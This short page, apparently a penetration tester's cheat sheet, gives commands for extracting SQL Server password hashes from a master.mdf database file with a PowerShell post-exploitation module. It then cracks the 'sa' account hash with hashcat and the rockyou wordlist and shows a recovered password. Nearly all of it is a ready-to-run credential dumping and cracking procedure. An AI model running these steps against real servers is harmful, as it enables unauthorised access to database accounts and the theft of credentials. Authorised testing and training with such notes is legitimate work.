Master MDF Hash Extraction
git clone https://github.com/xpn/Powershell-PostExploitation.gitEditing the file, 2 line to correct directory for dlls.
Import-Module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\Administrator\Desktop\master.mdf"
sa 0x.......hashcat -m 1731 -a 0 hash.txt rockyou.txt --force
sa - password1Last updated